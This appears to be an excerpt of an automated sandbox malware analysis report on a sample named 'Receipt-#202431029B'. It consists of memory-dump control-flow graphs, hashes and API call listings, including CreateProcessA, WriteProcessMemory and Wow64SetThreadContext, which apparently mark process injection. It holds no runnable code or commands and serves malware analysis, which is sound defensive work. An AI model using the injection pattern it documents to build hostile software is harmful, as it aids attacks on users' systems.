                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `Y~l$t^~l
                                                                  • API String ID: 0-1894046990
                                                                  • Opcode ID: f924b9a06ce0e3d096fb7b4e3c0e88cc53fe256f248c7bba3a59e5cd0a93f5ba
                                                                  • Instruction ID: 17ff812e6f8bc640b72e34c2973d202c6c4221c73f150fc7c67aad140b17023e
                                                                  • Opcode Fuzzy Hash: f924b9a06ce0e3d096fb7b4e3c0e88cc53fe256f248c7bba3a59e5cd0a93f5ba
                                                                  • Instruction Fuzzy Hash: 9E81D674E002189FDF58DFA9D994AEEBBB2FF89300F208129E4196B365DB345942DF40

                                                                  Control-flow Graph

                                                                  control_flow_graph 1584 a26f90-a26fc2 1585 a26fc4 1584->1585 1586 a26fc9-a2701f call a25c74 call a25c84 1584->1586 1585->1586 1594 a2702a-a2704d call a25c94 call a25ca4 1586->1594 1598 a27052-a27153 call a201f8 * 4 1594->1598 1618 a27160-a2722e 1598->1618 1619 a27155-a2715b 1598->1619 1631 a27238-a27247 1618->1631 1620 a27252-a2725f 1619->1620 1632 a2724f 1631->1632 1632->1620
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `Y~l$t^~l
                                                                  • API String ID: 0-1894046990
                                                                  • Opcode ID: 389bd3de354c92991c08bf03fc974f5d6e4d285c435d360f04edb938dac8677c
                                                                  • Instruction ID: 1b8052fa1281636208f857f142034c696904d8fdc1dc9cf1e0e2cedbb9d54079
                                                                  • Opcode Fuzzy Hash: 389bd3de354c92991c08bf03fc974f5d6e4d285c435d360f04edb938dac8677c
                                                                  • Instruction Fuzzy Hash: A451D670E012589FCB48DFA9D995AEEBBB2BF89300F10812AD415BB365DB345946CF90

                                                                  Control-flow Graph

                                                                  control_flow_graph 1650 757a16f-757a17e 1652 757a182-757a191 1650->1652 1653 757a180 1650->1653 1655 757a1e6-757a1ff 1652->1655 1656 757a193-757a36a 1652->1656 1653->1652 1660 757adc8-757add6 1655->1660 1661 757a370-757a3ab call 75743ac call 75743bc call 75743cc 1656->1661 1662 757a71a-757a71f 1656->1662 1663 757ade7-757adef 1660->1663 1664 757add8-757ade1 1660->1664 1680 757a3be-757a3de 1661->1680 1681 757a3ad-757a3b7 1661->1681 1668 757a721-757a723 1662->1668 1669 757a729-757a72c 1662->1669 1666 757ae01-757ae03 1663->1666 1667 757adf1-757adfb 1663->1667 1664->1663 1667->1666 1668->1669 1674 757a734-757a73c 1669->1674 1676 757a742-757a749 1674->1676 1683 757a3f1-757a411 1680->1683 1684 757a3e0-757a3ea 1680->1684 1681->1680 1686 757a424-757a444 1683->1686 1687 757a413-757a41d 1683->1687 1684->1683 1689 757a457-757a460 call 75743dc 1686->1689 1690 757a446-757a450 1686->1690 1687->1686 1693 757a484-757a48d call 75743ec 1689->1693 1694 757a462-757a47d call 75743dc 1689->1694 1690->1689 1699 757a4b1-757a4ba call 75743fc 1693->1699 1700 757a48f-757a4aa call 75743ec 1693->1700 1694->1693 1706 757a4c5-757a4e1 1699->1706 1707 757a4bc-757a4c0 call 757440c 1699->1707 1700->1699 1711 757a4e3-757a4e9 1706->1711 1712 757a4f9-757a4fd 1706->1712 1707->1706 1713 757a4ed-757a4ef 1711->1713 1714 757a4eb 1711->1714 1715 757a517-757a55f 1712->1715 1716 757a4ff-757a510 call 757441c 1712->1716 1713->1712 1714->1712 1722 757a583-757a58a 1715->1722 1723 757a561 1715->1723 1716->1715 1725 757a5a1-757a5af call 7579f38 1722->1725 1726 757a58c-757a59b 1722->1726 1724 757a564-757a56a 1723->1724 1727 757a570-757a576 1724->1727 1728 757a74a-757a758 1724->1728 1735 757a5b1-757a5b3 1725->1735 1736 757a5b9-757a5e3 1725->1736 1726->1725 1730 757a580-757a581 1727->1730 1731 757a578-757a57a 1727->1731 1737 757a6ef-757a6f5 1728->1737 1738 757a75a-757a789 1728->1738 1730->1722 1730->1724 1731->1730 1735->1736 1751 757a5e5-757a5f3 
1736->1751 1752 757a610-757a62c 1736->1752 1742 757a6f7-757a6fb 1737->1742 1743 757a701-757a719 1737->1743 1739 757a7e7-757a7f7 1738->1739 1740 757a78b-757a7ac 1738->1740 1748 757a9cd-757a9d4 1739->1748 1749 757a7fd-757a807 1739->1749 1740->1739 1750 757a7ae-757a7b4 1740->1750 1742->1743 1755 757a9d6-757a9de call 7574228 1748->1755 1756 757a9e3-757a9f6 1748->1756 1753 757a811-757a81b 1749->1753 1754 757a809-757a810 1749->1754 1757 757a7b6-757a7b8 1750->1757 1758 757a7c2-757a7c7 1750->1758 1751->1752 1766 757a5f5-757a609 1751->1766 1768 757a63f-757a666 call 7579f48 1752->1768 1769 757a62e-757a638 1752->1769 1759 757a821-757a861 1753->1759 1760 757aa00-757abc3 1753->1760 1755->1756 1757->1758 1763 757a7d3-757a7e0 1758->1763 1764 757a7c9-757a7cd 1758->1764 1789 757a863-757a869 1759->1789 1790 757a879-757a87d 1759->1790 1760->1660 1763->1739 1764->1763 1766->1752 1779 757a67e-757a682 1768->1779 1780 757a668-757a66e 1768->1780 1769->1768 1784 757a684-757a696 1779->1784 1785 757a69d-757a6b9 1779->1785 1782 757a672-757a674 1780->1782 1783 757a670 1780->1783 1782->1779 1783->1779 1784->1785 1792 757a6d1-757a6d5 1785->1792 1793 757a6bb-757a6c1 1785->1793 1797 757a86d-757a86f 1789->1797 1798 757a86b 1789->1798 1794 757a87f-757a8a4 1790->1794 1795 757a8aa-757a8c2 call 757a05c 1790->1795 1792->1676 1801 757a6d7-757a6e5 1792->1801 1799 757a6c5-757a6c7 1793->1799 1800 757a6c3 1793->1800 1794->1795 1811 757a8c4-757a8c9 1795->1811 1812 757a8cf-757a8d7 1795->1812 1797->1790 1798->1790 1799->1792 1800->1792 1801->1742 1808 757a6e7-757a6f5 1801->1808 1808->1742 1808->1743 1811->1812 1815 757a8ed-757a90c 1812->1815 1816 757a8d9-757a8e7 1812->1816 1820 757a924-757a928 1815->1820 1821 757a90e-757a914 1815->1821 1816->1815 1824 757a981-757a9ca 1820->1824 1825 757a92a-757a937 1820->1825 1822 757a916 1821->1822 1823 757a918-757a91a 1821->1823 1822->1820 1823->1820 1824->1748 1829 757a96d-757a97a 1825->1829 1830 757a939-757a96b 1825->1830 1829->1824 1830->1829
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: dZk^
                                                                  • API String ID: 0-4277263025
                                                                  • Opcode ID: 0f971e9010b3d60c9ca7c554813bde6cae294e53b97401539cb56c37ba2a5bf9
                                                                  • Instruction ID: 396365bdc4b5265c1821a519eaf6a455fe5ceea8b3d9b8b00b2090f6d5e0ca43
                                                                  • Opcode Fuzzy Hash: 0f971e9010b3d60c9ca7c554813bde6cae294e53b97401539cb56c37ba2a5bf9
                                                                  • Instruction Fuzzy Hash: C5329EB0B012158FDB19DB79E550BAEBBF6BF89300F14846AE5069B3A1CB31ED41CB51

                                                                  Control-flow Graph

                                                                  control_flow_graph 1838 8b31240-8b31271 1839 8b31273 1838->1839 1840 8b31278-8b3133d 1838->1840 1839->1840 1846 8b3138b-8b3139c 1840->1846 1847 8b3133f-8b31377 1846->1847 1848 8b3139e-8b31406 1846->1848 1851 8b31379 1847->1851 1852 8b3137e-8b31388 1847->1852 1856 8b31c60-8b31c8b 1848->1856 1851->1852 1852->1846 1858 8b31cb8-8b31cba 1856->1858 1859 8b31c8d-8b31cb6 1856->1859 1860 8b31cc0-8b31cd4 1858->1860 1859->1860 1862 8b3140b-8b31412 1860->1862 1863 8b31cda-8b31ce1 1860->1863 1864 8b31464-8b3149f 1862->1864 1866 8b314a5-8b314ae 1864->1866 1867 8b31414-8b3142a 1864->1867 1870 8b314b1-8b314e5 1866->1870 1868 8b31431-8b3144f 1867->1868 1869 8b3142c 1867->1869 1871 8b31451 1868->1871 1872 8b31456-8b31461 1868->1872 1869->1868 1874 8b314e7-8b31501 1870->1874 1875 8b31504-8b3152b 1870->1875 1871->1872 1872->1864 1874->1875 1878 8b31558 1875->1878 1879 8b3152d-8b31556 1875->1879 1880 8b31562-8b31570 1878->1880 1879->1880 1882 8b31660-8b3170d 1880->1882 1883 8b31576-8b3157d 1880->1883 1907 8b31713-8b31715 1882->1907 1908 8b3170f 1882->1908 1884 8b31643-8b31654 1883->1884 1886 8b31582-8b31598 1884->1886 1887 8b3165a-8b3165b 1884->1887 1888 8b3159a 1886->1888 1889 8b3159f-8b315fd 1886->1889 1890 8b31c07-8b31c42 1887->1890 1888->1889 1900 8b31604-8b31629 1889->1900 1901 8b315ff 1889->1901 1890->1870 1895 8b31c48-8b31c5f 1890->1895 1895->1856 1905 8b3162b-8b31637 1900->1905 1906 8b3163f-8b31640 1900->1906 1901->1900 1905->1906 1906->1884 1911 8b3171c-8b31723 1907->1911 1909 8b31711 1908->1909 1910 8b31717 1908->1910 1909->1907 1910->1911 1912 8b31731-8b31762 1911->1912 1913 8b31725-8b3172e 1911->1913 1915 8b317b5-8b317f0 1912->1915 1913->1912 1917 8b317f6-8b31809 1915->1917 1918 8b31764-8b31779 1915->1918 1922 8b31811-8b318dd 1917->1922 1923 8b3180b-8b319b2 1917->1923 1920 8b31780-8b3179e 1918->1920 1921 8b3177b 1918->1921 1924 8b317a0 1920->1924 1925 8b317a5-8b317b2 1920->1925 1921->1920 1945 8b318e7-8b318fd 
1922->1945 1928 8b319b4-8b319b5 1923->1928 1929 8b319ba-8b31a59 1923->1929 1924->1925 1925->1915 1930 8b31bc2-8b31bef 1928->1930 1949 8b31a60-8b31a92 1929->1949 1950 8b31a5b 1929->1950 1934 8b31bf1-8b31c05 1930->1934 1935 8b31c06 1930->1935 1934->1935 1935->1890 1947 8b31904-8b31917 1945->1947 1948 8b318ff 1945->1948 1951 8b31919 1947->1951 1952 8b3191e-8b3192b 1947->1952 1948->1947 1956 8b31a94 1949->1956 1957 8b31a99-8b31acb 1949->1957 1950->1949 1951->1952 1953 8b31932-8b31956 1952->1953 1954 8b3192d 1952->1954 1960 8b31958 1953->1960 1961 8b3195d-8b31977 1953->1961 1954->1953 1956->1957 1962 8b31ad2-8b31b2f 1957->1962 1963 8b31acd 1957->1963 1960->1961 1964 8b319a2-8b319a3 1961->1964 1965 8b31979-8b31998 1961->1965 1970 8b31b81-8b31ba3 1962->1970 1971 8b31b31-8b31b7b 1962->1971 1963->1962 1964->1930 1966 8b3199a 1965->1966 1967 8b3199f 1965->1967 1966->1967 1967->1964 1975 8b31bad-8b31bc0 1970->1975 1971->1970 1975->1930
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1694046517.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8b30000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: d
                                                                  • API String ID: 0-2564639436
                                                                  • Opcode ID: e0099293dc9bbe6083cc7da64177360fd4ab31d94bc91cbb3a2f4f60dd87d882
                                                                  • Instruction ID: 3ed564ba8addbbb571162973d25a6b43b19d7893d1e4bf02e2b59ad0b6abdd41
                                                                  • Opcode Fuzzy Hash: e0099293dc9bbe6083cc7da64177360fd4ab31d94bc91cbb3a2f4f60dd87d882
                                                                  • Instruction Fuzzy Hash: E962BE74E01228CFDB24DF69C984BDDBBB6BB49301F1081E9E409AB255DB34AE85CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ae11a7f186a481de0f09a7579d2efc7c03e9f43b96f93dce40ee028a5e6608c
                                                                  • Instruction ID: 981be329610bab8f74f529c8b06d8d2a46197cd48a4af511c3c75be3ec7a1f31
                                                                  • Opcode Fuzzy Hash: 3ae11a7f186a481de0f09a7579d2efc7c03e9f43b96f93dce40ee028a5e6608c
                                                                  • Instruction Fuzzy Hash: 2D211CB1D052598FEB09CF67D9147EEBFF6AF8A300F08C16AD408A62A5DB740945CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c309142cdb15228f6049413a528785fc70bafd81ee5f3aa5c68c85415cc9275
                                                                  • Instruction ID: 1ae9e6a3f0ef840ec11d9d8beada1377bad618e2791ebc58dffd6d2682cf99e7
                                                                  • Opcode Fuzzy Hash: 1c309142cdb15228f6049413a528785fc70bafd81ee5f3aa5c68c85415cc9275
                                                                  • Instruction Fuzzy Hash: 6221C4B0D056198BEB18CFABD8047EEFAF6BFC9310F04C56AD409A62A4DB740945CF90

                                                                  Control-flow Graph

                                                                  control_flow_graph 1296 a2d570-a2d60f GetCurrentProcess 1300 a2d611-a2d617 1296->1300 1301 a2d618-a2d64c GetCurrentThread 1296->1301 1300->1301 1302 a2d655-a2d689 GetCurrentProcess 1301->1302 1303 a2d64e-a2d654 1301->1303 1304 a2d692-a2d6ad call a2d74f 1302->1304 1305 a2d68b-a2d691 1302->1305 1303->1302 1309 a2d6b3-a2d6e2 GetCurrentThreadId 1304->1309 1305->1304 1310 a2d6e4-a2d6ea 1309->1310 1311 a2d6eb-a2d74d 1309->1311 1310->1311
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 00A2D5FE
                                                                  • GetCurrentThread.KERNEL32 ref: 00A2D63B
                                                                  • GetCurrentProcess.KERNEL32 ref: 00A2D678
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00A2D6D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: df74306772683ff5a560064f4c79faeac38d2c8815fad3ca05caaf07f8025582
                                                                  • Instruction ID: f7f13fe34b62ff631fe0cc882e8db09168068eb9dc50c23d590dabff38439f9d
                                                                  • Opcode Fuzzy Hash: df74306772683ff5a560064f4c79faeac38d2c8815fad3ca05caaf07f8025582
                                                                  • Instruction Fuzzy Hash: 195169B09003498FDB14DFAAD548BDEBFF1EF48314F208469E419A72A1D7349944CB65

                                                                  Control-flow Graph

                                                                  control_flow_graph 1318 a2d580-a2d60f GetCurrentProcess 1322 a2d611-a2d617 1318->1322 1323 a2d618-a2d64c GetCurrentThread 1318->1323 1322->1323 1324 a2d655-a2d689 GetCurrentProcess 1323->1324 1325 a2d64e-a2d654 1323->1325 1326 a2d692-a2d6ad call a2d74f 1324->1326 1327 a2d68b-a2d691 1324->1327 1325->1324 1331 a2d6b3-a2d6e2 GetCurrentThreadId 1326->1331 1327->1326 1332 a2d6e4-a2d6ea 1331->1332 1333 a2d6eb-a2d74d 1331->1333 1332->1333
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 00A2D5FE
                                                                  • GetCurrentThread.KERNEL32 ref: 00A2D63B
                                                                  • GetCurrentProcess.KERNEL32 ref: 00A2D678
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00A2D6D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: b4b4d8ecf959e06209a33de50a6a7f3839ba9e588ddaaebae23cc2fb000fcf55
                                                                  • Instruction ID: a698ff6875ae7bb791ca5734b09b8a37ebc9715d0fcb219de9bf8f3f55b6bd6d
                                                                  • Opcode Fuzzy Hash: b4b4d8ecf959e06209a33de50a6a7f3839ba9e588ddaaebae23cc2fb000fcf55
                                                                  • Instruction Fuzzy Hash: 065147B09003498FDB14DFAAD548BAEBBF1EF88314F20C469E419A7391D774A944CB65

                                                                  Control-flow Graph

                                                                  control_flow_graph 1389 72e9250-72e925d 1390 72e925f-72e9276 1389->1390 1391 72e9208-72e9240 1389->1391 1393 72e9333-72e9342 1390->1393 1395 72e934d-72e93ae 1393->1395 1410 72e932a 1395->1410 1412 72e9287-72e9331 1410->1412 1413 72e9280 1410->1413 1412->1410 1413->1393 1413->1412 1414 72e92b7-72e92d5 1413->1414 1415 72e9315-72e9329 1413->1415 1420 72e92dc-72e92e9 1414->1420 1421 72e92d7-72e92da 1414->1421 1422 72e92eb-72e92fa 1420->1422 1421->1422 1425 72e92fc-72e9302 1422->1425 1426 72e9312 1422->1426 1427 72e9306-72e9308 1425->1427 1428 72e9304 1425->1428 1426->1415 1427->1426 1428->1426
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8hq$8hq$8hq
                                                                  • API String ID: 0-1838490158
                                                                  • Opcode ID: 9568a1a8d5ebed37d5683617108be751b0326c35c9850bcb3ea1ec7038ae4f9c
                                                                  • Instruction ID: ca6a6293c308f8bd6f7dcd79010dae13d9b309a2a2d669fe8e7b0ac745f06160
                                                                  • Instruction Fuzzy Hash: 09312CF0A38206DFDF009AA484555BE77B9EBCA300F918057D5C7973C0D6B16C8287A3

                                                                  Control-flow Graph (rendered graph omitted; the API calls it contains are listed under APIs below)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$$dq$$dq
                                                                  • API String ID: 0-2227312764
                                                                  • Opcode ID: 1c89af8d75e090a502c8e6514b1fed43f806f74545a8a86adec047053d8ace38
                                                                  • Instruction ID: 047c46b3310292d4cb8297c265c357e6db84fb7bfe64f97e79170928ca12b239
                                                                  • Instruction Fuzzy Hash: BF01FEB0770306DFE7108B24DC1A7AA7776FB00704F699856EC859F6C1EAB09D90C791

                                                                  Control-flow Graph (rendered graph omitted; the API calls it contains are listed under APIs below)
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0757559E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID: U
                                                                  • API String ID: 983334009-3372436214
                                                                  • Opcode ID: 627c3df7f59a0f25b9be4064c44c285e0d26a08835bcaa753e4d966e81092f5a
                                                                  • Instruction ID: 7161f674a077a87c48e32150a8c55603aff771336497818464585ed24aeafa85
                                                                  • Instruction Fuzzy Hash: 1B2157B19007098FDB10DFAAC4857EEBBF5EF88324F54842AD419A7241DB789944CFA0

                                                                  Control-flow Graph (rendered graph omitted; the API calls it contains are listed under APIs below)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (hq$Hhq
                                                                  • API String ID: 0-2633903351
                                                                  • Opcode ID: 66f9276b9c22ff9e5f52c6f613198fb9a6eb6519e9a7645a027a8c7992827214
                                                                  • Instruction ID: e1092146db9b2a64727d02206a0fb0e1069a93be59c55b8eb11316d2cf0034ea
                                                                  • Instruction Fuzzy Hash: 4171BDB0A106198FDB14EF79D9147AEBBFAFF88310F54842DD506A7280DB389D41CBA5

                                                                  Control-flow Graph (rendered graph omitted; the API calls it contains are listed under APIs below)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq
                                                                  • API String ID: 0-2340669324
                                                                  • Opcode ID: fe3654dcd1f0a90486f5b5e15f43559c36c31f4f6db9ee2776783eed55b724ac
                                                                  • Instruction ID: c71fe5b00ca276dfd3f9f9d23fecbe6894594edd377f1183c27c820a6a8791e1
                                                                  • Instruction Fuzzy Hash: 5C0128B053A282CFC315D725D810261BBB9BB07304F94A2EBD499CB152C7B18882C3AA

                                                                  Control-flow Graph (rendered graph omitted; the API calls it contains are listed under APIs below)
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07575FAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: ee9828720dc22fe621be51b905001f6aad55cf8634fa8895ee63ffb236256c78
                                                                  • Instruction ID: ed2d6affb344e1f9fb767eec1b9981b18a349954589b45170dfd07a07c74395c
                                                                  • Instruction Fuzzy Hash: 34A17DB1D0065ADFDB14CF68D841BEDBBB2FF48310F1481AAE819A7240DB749995CF91
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07575FAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 9d4d72e143a97df686e5ad2d8be3c365f0937be84ac85a430a3aad09118d8636
                                                                  • Instruction ID: fe11ddb952de39fe187c48ed20e02e0db9b6c0674b41c0957403d90466a698d3
                                                                  • Instruction Fuzzy Hash: F6916DB1D0065ACFDB14CF68D941BEDBBB2FF48310F1481AAD819A7280DB749995CF91
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00A2B566
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: b5ef4f9603d1ab46d71a6c03c2aaea3d15bfc216b3ac3c48dcb79855f84f7854
                                                                  • Instruction ID: 268be2fe270d21545803d7ec46d4de4daecfa3a942e388e693486efa60c99790
                                                                  • Instruction Fuzzy Hash: 0F8168B0A10B558FD724DF29E18179ABBF1FF88310F00892DD48ACBA51D774E845CBA1
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 00A259C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: db75e7343e9069af82f3d59eb68d95de999f278bf5415e886ba4864d5602dc52
                                                                  • Instruction ID: b8bbdda3629a113f2220743da7d33ce488901a85c8301c289dba996dd470c761
                                                                  • Instruction Fuzzy Hash: 2941F2B0C00719CBDB24DFAAC885BDDBBF1BF49314F20816AD409AB251DB75A986CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 07f304a538e24f2c54501c4fe38971512939961558116a36ea33e5b02c3588dd
                                                                  • Instruction ID: 9302772fdf0963c32f8d4b0427617145fd98df92199895e613db0cc24bd0bd9f
                                                                  • Instruction Fuzzy Hash: 6631CCB1C04B19CFCB11CBBCD8896ADBBF0FF55324F10826AC406AB251C775A986CB51
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 00A259C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: 10a52aab34efc2523ad5b3685c9015866dc57b9f7afa94ca59c45662d0599bf4
                                                                  • Instruction ID: d9b16ca1ace5283e9054fd798555b00b381fda6faece3122946085d76c0e6fbe
                                                                  • Instruction Fuzzy Hash: E241E4B0C0071DCBDB24DFAAC885B9DBBF5BF48314F60816AD409AB251DB75A945CF90
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07575B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 608c93edc45d220553e66c129214b3badd8d2eeb8ba6edfa48f4b2f2aafea412
                                                                  • Instruction ID: b6f5cc97e388f58bf1f028c9b8c4c8df22d596e60c48b6b8e6676f2a45618fa9
                                                                  • Instruction Fuzzy Hash: 6A215AB19003499FDB10DFAAD885BEEBBF5FF48320F10842AE919A7240D7749954CBA5
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07575B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: f911dde330ea03fee79c7bf75489e0cd90950226e2cef1b1aee7d4a691a9c716
                                                                  • Instruction ID: 859487d143919feeaa7c6cc8150adfa16561d2224b4f720ad34af331ca0de13e
                                                                  • Instruction Fuzzy Hash: 592139B19003499FCF10DFA9C885BEEBBF5FF48310F10842AE919A7240D7789954CBA4
                                                                  APIs
                                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0572F05F
                                                                  Memory Dump Source
